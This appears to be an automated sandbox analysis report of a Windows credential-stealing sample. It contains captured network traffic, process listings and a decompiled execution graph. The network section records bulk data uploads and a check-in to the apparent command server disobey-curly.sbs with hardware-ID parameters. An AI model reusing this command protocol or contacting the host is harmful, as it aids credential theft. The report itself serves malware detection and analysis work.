                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: eb ea c2 57 c6 5a 6d 6b 7a 33 21 8f d3 13 4c d4 3e ee d8 77 df a2 5f a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b
                                                                      Data Ascii: WZmkz3!L>w_ ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/O
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 3d f0 cc d6 73 31 4c ef 6d 84 a7 97 42 dd f9 27 5f 58 93 74 39 38 16 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f
                                                                      Data Ascii: =s1LmB'_Xt98XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 25 78 c8 8b db 6b e2 98 2a fd 98 85 e0 da 7f db 16 bb 02 2a b9 36 eb 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63
                                                                      Data Ascii: %xk**6Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpac
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 31 7a 5b 46 eb bf 8e f6 36 e0 bf 4d 79 a7 f9 11 77 fc 98 6c d1 a1 b7 d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a
                                                                      Data Ascii: 1z[F6Mywl7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: fd 0d 85 5f a0 e8 c6 aa 91 50 b7 94 e3 2d 7a 86 c1 4c fa 4c 1d 94 82 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce
                                                                      Data Ascii: _P-zLLTf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhS
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 72 28 49 07 63 7b e6 c0 0d 9b 31 44 a7 bb a6 0a 1d 87 92 61 9d 5b 4b 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55
                                                                      Data Ascii: r(Ic{1Da[KFV~Rg}OET 4c-=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 9b ce 82 ec c6 5a eb df f5 6e 4c 11 96 ca 56 fe df 85 8e d7 bb be 91 a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03
                                                                      Data Ascii: ZnLVWsh7#r<M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'
                                                                      2024-11-23 14:00:08 UTC1023INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:00:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=h56kbpacjamue243sn9mu9l2ce; expires=Wed, 19-Mar-2025 07:46:47 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3DORepmUD7PJDN6vh2SrFUGrZGBz6%2BJvCm%2FLHVGCp8Lz6LaKJFynNfnOtjpFIdrW2ojdmOis2SJI92e6q9PI52aXx3uKTXXHdxfn1XAMCMNgBZkHlk1XrVZXxox%2Bs3xhQJ4xzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aef8ba2a6a56-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=346&recv=573&lost=0&retrans=0&sent_bytes=2846&recv_bytes=570761&delivery_rate=1580086&cwnd=221&unsent_bytes=0&cid=3fea88729d3e9fc5&ts=3285&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.449744172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:00:09 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 84
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 14:00:09 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 26 6a 3d 26 68 77 69 64 3d 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                      Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--lonikir&j=&hwid=E6CF65B298BA1436D7CBBD6DF28D3732
                                                                      2024-11-23 14:00:10 UTC1017INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:00:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=713hs0k6o94oss0gar5sr3r1m4; expires=Wed, 19-Mar-2025 07:46:49 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNZIqlC6ieX94t8PI8j2oFjaUbC6Z3H%2BUu0NOFKlBpe1jUWWd6PQZ5Xk7JNytyncwRRWcQVuxOiOLxi7WHNKnQj%2FcyaBP1AdXR%2FjAOkwwrc%2BEpLrNPCwBY2QVIPZLyqSefBSWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71af15f9fe8c33-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1988&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=985&delivery_rate=1488277&cwnd=244&unsent_bytes=0&cid=5d1b913322739ca0&ts=726&x=0"
                                                                      2024-11-23 14:00:10 UTC54INData Raw: 33 30 0d 0a 36 56 73 47 66 71 6e 75 65 2b 71 35 37 46 5a 4d 35 52 76 4c 74 42 79 45 73 77 4b 48 7a 51 4e 73 43 78 73 73 6c 52 71 72 30 64 43 79 42 67 3d 3d 0d 0a
                                                                      Data Ascii: 306VsGfqnue+q57FZM5RvLtByEswKHzQNsCxsslRqr0dCyBg==
                                                                      2024-11-23 14:00:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:08:59:48
                                                                      Start date:23/11/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x5e0000
                                                                      File size:665'088 bytes
                                                                      MD5 hash:E7AA83909ACE3906EC75144CC33E024C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:08:59:48
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:08:59:48
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                      Imagebase:0x800000
                                                                      File size:43'016 bytes
                                                                      MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1799079639.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:08:59:49
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224
                                                                      Imagebase:0xdd0000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:8.5%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:6.6%
                                                                        Total number of Nodes:1435
                                                                        Total number of Limit Nodes:10
                                                                        execution_graph 9083 6cd9ecdf 9084 6cd9ece8 9083->9084 9085 6cd9ed8e 9084->9085 9087 6cd9ed0f 9084->9087 9092 6cd9fa77 9085->9092 9086 6cd9f9a0 9087->9086 9090 6cd9fa77 20 API calls 9087->9090 9091 6cd9f99e 9090->9091 9093 6cd9fa80 9092->9093 9096 6cd9ff93 9093->9096 9097 6cd9ffd2 __startOneArgErrorHandling 9096->9097 9101 6cda0054 __startOneArgErrorHandling 9097->9101 9104 6cda039e 9097->9104 9100 6cda0089 9102 6cd96b60 _ValidateLocalCookies 5 API calls 9100->9102 9101->9100 9107 6cda06b7 9101->9107 9103 6cd9ed9e 9102->9103 9114 6cda03c1 9104->9114 9108 6cda06d9 9107->9108 9109 6cda06c4 9107->9109 9111 6cd99fa3 _free 14 API calls 9108->9111 9110 6cda06de 9109->9110 9112 6cd99fa3 _free 14 API calls 9109->9112 9110->9100 9111->9110 9113 6cda06d1 9112->9113 9113->9100 9115 6cda03ec __raise_exc 9114->9115 9116 6cda05e5 RaiseException 9115->9116 9117 6cda03bc 9116->9117 9117->9101 9403 6cd9a45e 9410 6cd9a7ed 9403->9410 9406 6cd9a478 9408 6cd9a013 _free 14 API calls 9406->9408 9407 6cd9a013 _free 14 API calls 9407->9406 9409 6cd9a41a 9408->9409 9411 6cd9a7ff 9410->9411 9420 6cd9a469 9410->9420 9412 6cd9a82a 9411->9412 9413 6cd9a804 9411->9413 9412->9420 9421 6cd9b47f 9412->9421 9414 6cd99fb6 _free 14 API calls 9413->9414 9416 6cd9a80d 9414->9416 9418 6cd9a013 _free 14 API calls 9416->9418 9417 6cd9a84a 9419 6cd9a013 _free 14 API calls 9417->9419 9418->9420 9419->9420 9420->9406 9420->9407 9422 6cd9b48c 9421->9422 9423 6cd9b4a7 9421->9423 9422->9423 9424 6cd9b498 9422->9424 9425 6cd9b4b6 9423->9425 9430 6cd9d419 9423->9430 9426 6cd99fa3 _free 14 API calls 9424->9426 9437 6cd9d44c 9425->9437 9429 6cd9b49d __DllMainCRTStartup@12 9426->9429 9429->9417 9431 6cd9d439 HeapSize 9430->9431 9432 6cd9d424 9430->9432 9431->9425 9433 6cd99fa3 _free 14 API calls 9432->9433 9434 6cd9d429 9433->9434 9435 6cd99ee6 __fassign 25 API calls 9434->9435 9436 6cd9d434 9435->9436 9436->9425 9438 6cd9d459 9437->9438 9439 6cd9d464 9437->9439 9449 6cd9c38c 9438->9449 9440 6cd9d46c 9439->9440 9447 6cd9d475 _free 9439->9447 9442 6cd9a013 _free 14 API calls 9440->9442 9445 6cd9d461 9442->9445 9443 6cd9d47a 9446 6cd99fa3 _free 14 API calls 9443->9446 9444 6cd9d49f HeapReAlloc 9444->9445 9444->9447 9445->9429 9446->9445 9447->9443 9447->9444 9456 6cd9bbd5 9447->9456 9450 6cd9c3ca 9449->9450 9454 6cd9c39a _free 9449->9454 9452 6cd99fa3 _free 14 API calls 9450->9452 9451 6cd9c3b5 HeapAlloc 9453 6cd9c3c8 9451->9453 9451->9454 9452->9453 9453->9445 9454->9450 9454->9451 9455 6cd9bbd5 _free 2 API calls 9454->9455 9455->9454 9459 6cd9bc02 9456->9459 9460 6cd9bc0e ___scrt_is_nonwritable_in_current_image 9459->9460 9465 6cd99caa EnterCriticalSection 9460->9465 9462 6cd9bc19 9466 6cd9bc55 9462->9466 9465->9462 9469 6cd99cf2 LeaveCriticalSection 9466->9469 9468 6cd9bbe0 9468->9447 9469->9468 9066 6cd9c250 9067 6cd9c25d 9066->9067 9068 6cd99fb6 _free 14 API calls 9067->9068 9069 6cd9c277 9068->9069 9070 6cd9a013 _free 14 API calls 9069->9070 9071 6cd9c283 9070->9071 9072 6cd99fb6 _free 14 API calls 9071->9072 9076 6cd9c2a9 9071->9076 9073 6cd9c29d 9072->9073 9075 6cd9a013 _free 14 API calls 9073->9075 9075->9076 9077 6cd9c2b5 9076->9077 9078 6cd9b7e2 9076->9078 9079 6cd9b601 _free 5 API calls 9078->9079 9080 6cd9b7fe 9079->9080 9081 6cd9b81c InitializeCriticalSectionAndSpinCount 9080->9081 9082 6cd9b807 9080->9082 9081->9082 9082->9076 9891 6cd9f1d0 9894 6cd9f1ee 9891->9894 9893 6cd9f1e6 9898 6cd9f1f3 9894->9898 9896 6cd9f288 9896->9893 9898->9896 9899 6cd9fab3 9898->9899 9900 6cd9fac6 DecodePointer 9899->9900 9901 6cd9fad6 9899->9901 9900->9901 9902 6cd9fb1a 9901->9902 9903 6cd9f41f 9901->9903 9904 6cd9fb05 9901->9904 9902->9903 9905 6cd99fa3 _free 14 API calls 9902->9905 9903->9893 9904->9903 9906 6cd99fa3 _free 14 API calls 9904->9906 9905->9903 9906->9903 9470 6cd98c48 9471 6cd98c58 9470->9471 9472 6cd98c5f 9470->9472 9473 6cd98c80 9472->9473 9474 6cd98c6a 9472->9474 9494 6cd9af3a 9473->9494 9476 6cd99fa3 _free 14 API calls 9474->9476 9478 6cd98c6f 9476->9478 9480 6cd99ee6 __fassign 25 API calls 9478->9480 9480->9471 9486 6cd98cf0 9489 6cd98d7e 37 API calls 9486->9489 9487 6cd98ce4 9488 6cd99fa3 _free 14 API calls 9487->9488 9490 6cd98ce9 9488->9490 9492 6cd98d08 9489->9492 9491 6cd9a013 _free 14 API calls 9490->9491 9491->9471 9492->9490 9492->9492 9493 6cd9a013 _free 14 API calls 9492->9493 9493->9490 9495 6cd98c86 9494->9495 9496 6cd9af43 9494->9496 9500 6cd9a981 GetModuleFileNameW 9495->9500 9522 6cd99ad4 9496->9522 9501 6cd9a9c1 9500->9501 9502 6cd9a9b0 GetLastError 9500->9502 9765 6cd9a6fa 9501->9765 9760 6cd99f6d 9502->9760 9505 6cd9a9bc 9508 6cd96b60 _ValidateLocalCookies 5 API calls 9505->9508 9509 6cd98c99 9508->9509 9510 6cd98d7e 9509->9510 9512 6cd98da3 9510->9512 9514 6cd98e03 9512->9514 9804 6cd9b260 9512->9804 9513 6cd98cce 9516 6cd98ef2 9513->9516 9514->9513 9515 6cd9b260 37 API calls 9514->9515 9515->9514 9517 6cd98cdb 9516->9517 9518 6cd98f03 9516->9518 9517->9486 9517->9487 9518->9517 9519 6cd99fb6 _free 14 API calls 9518->9519 9520 6cd98f2c 9519->9520 9521 6cd9a013 _free 14 API calls 9520->9521 9521->9517 9523 6cd99adf 9522->9523 9524 6cd99ae5 9522->9524 9525 6cd9b761 _free 6 API calls 9523->9525 9526 6cd9b7a0 _free 6 API calls 9524->9526 9527 6cd99aeb 9524->9527 9525->9524 9528 6cd99aff 9526->9528 9530 6cd994f9 __fassign 37 API calls 9527->9530 9535 6cd99b64 9527->9535 9528->9527 9529 6cd99fb6 _free 14 API calls 9528->9529 9531 6cd99b0f 9529->9531 9532 6cd99b6d 9530->9532 9533 6cd99b2c 9531->9533 9534 6cd99b17 9531->9534 9537 6cd9b7a0 _free 6 API calls 9533->9537 9536 6cd9b7a0 _free 6 API calls 9534->9536 9547 6cd9ad86 9535->9547 9538 6cd99b23 9536->9538 9539 6cd99b38 9537->9539 9542 6cd9a013 _free 14 API calls 9538->9542 9540 6cd99b4b 9539->9540 9541 6cd99b3c 9539->9541 9544 6cd99819 _free 14 API calls 9540->9544 9543 6cd9b7a0 _free 6 API calls 9541->9543 9542->9527 9543->9538 9545 6cd99b56 9544->9545 9546 6cd9a013 _free 14 API calls 9545->9546 9546->9527 9566 6cd9ae9a 9547->9566 9567 6cd9aea6 ___scrt_is_nonwritable_in_current_image 9566->9567 9573 6cd9aec0 9567->9573 9603 6cd99caa EnterCriticalSection 9567->9603 9569 6cd9aed0 9575 6cd9a013 _free 14 API calls 9569->9575 9576 6cd9aefc 9569->9576 9570 6cd9ad99 9577 6cd9ab30 9570->9577 9572 6cd994f9 __fassign 37 API calls 9574 6cd9af39 9572->9574 9573->9570 9573->9572 9575->9576 9604 6cd9af19 9576->9604 9608 6cd9953d 9577->9608 9603->9569 9607 6cd99cf2 LeaveCriticalSection 9604->9607 9606 6cd9af20 9606->9573 9607->9606 9609 6cd9955d 9608->9609 9610 6cd99a17 __fassign 37 API calls 9609->9610 9611 6cd9957d 9610->9611 9615 6cd9c536 9611->9615 9616 6cd9c549 9615->9616 9617 6cd99593 9615->9617 9616->9617 9623 6cd9c944 9616->9623 9619 6cd9c563 9617->9619 9620 6cd9c58b 9619->9620 9621 6cd9c576 9619->9621 9621->9620 9645 6cd9af82 9621->9645 9624 6cd9c950 ___scrt_is_nonwritable_in_current_image 9623->9624 9625 6cd99a17 __fassign 37 API calls 9624->9625 9626 6cd9c959 9625->9626 9627 6cd9c99f 9626->9627 9636 6cd99caa EnterCriticalSection 9626->9636 9627->9617 9629 6cd9c977 9637 6cd9c9c5 9629->9637 9634 6cd994f9 __fassign 37 API calls 9635 6cd9c9c4 9634->9635 9636->9629 9638 6cd9c9d3 __fassign 9637->9638 9640 6cd9c988 9637->9640 9639 6cd9c6f8 __fassign 14 API calls 9638->9639 9638->9640 9639->9640 9641 6cd9c9a4 9640->9641 9644 6cd99cf2 LeaveCriticalSection 9641->9644 9643 6cd9c99b 9643->9627 9643->9634 9644->9643 9646 6cd99a17 __fassign 37 API calls 9645->9646 9647 6cd9af8c 9646->9647 9648 6cd9ae9a __fassign 37 API calls 9647->9648 9649 6cd9af92 9648->9649 9649->9620 9791 6cd99f90 9760->9791 9762 6cd99f78 _free 9763 6cd99fa3 _free 14 API calls 9762->9763 9764 6cd99f8b 9763->9764 9764->9505 9766 6cd9953d __fassign 37 API calls 9765->9766 9767 6cd9a70c 9766->9767 9768 6cd9a71e 9767->9768 9794 6cd9b6c4 9767->9794 9770 6cd9a87f 9768->9770 9771 6cd9a89b 9770->9771 9787 6cd9a88c 9770->9787 9772 6cd9a8c8 9771->9772 9773 6cd9a8a3 9771->9773 9774 6cd9b30d ___scrt_uninitialize_crt WideCharToMultiByte 9772->9774 9773->9787 9800 6cd9a946 9773->9800 9776 6cd9a8d8 9774->9776 9777 6cd9a8df GetLastError 9776->9777 9778 6cd9a8f5 9776->9778 9779 6cd99f6d __dosmaperr 14 API calls 9777->9779 9780 6cd9a906 9778->9780 9783 6cd9a946 14 API calls 9778->9783 9782 6cd9a8eb 9779->9782 9781 6cd9b30d ___scrt_uninitialize_crt WideCharToMultiByte 9780->9781 9780->9787 9784 6cd9a91e 9781->9784 9785 6cd99fa3 _free 14 API calls 9782->9785 9783->9780 9786 6cd9a925 GetLastError 9784->9786 9784->9787 9785->9787 9788 6cd99f6d __dosmaperr 14 API calls 9786->9788 9787->9505 9789 6cd9a931 9788->9789 9790 6cd99fa3 _free 14 API calls 9789->9790 9790->9787 9792 6cd99b6e _free 14 API calls 9791->9792 9793 6cd99f95 9792->9793 9793->9762 9797 6cd9b4ec 9794->9797 9798 6cd9b601 _free 5 API calls 9797->9798 9799 6cd9b502 9798->9799 9799->9768 9801 6cd9a951 9800->9801 9802 6cd99fa3 _free 14 API calls 9801->9802 9803 6cd9a95a 9802->9803 9803->9787 9807 6cd9b209 9804->9807 9808 6cd9953d __fassign 37 API calls 9807->9808 9809 6cd9b21d 9808->9809 9809->9512 9989 6cd98f4d 9990 6cd9af3a 47 API calls 9989->9990 9991 6cd98f5f 9990->9991 10000 6cd9b3fb GetEnvironmentStringsW 9991->10000 9995 6cd9a013 _free 14 API calls 9997 6cd98f99 9995->9997 9998 6cd9a013 _free 14 API calls 9999 6cd98f6a 9998->9999 9999->9995 10001 6cd9b468 10000->10001 10002 6cd9b412 10000->10002 10003 6cd98f64 10001->10003 10004 6cd9b471 FreeEnvironmentStringsW 10001->10004 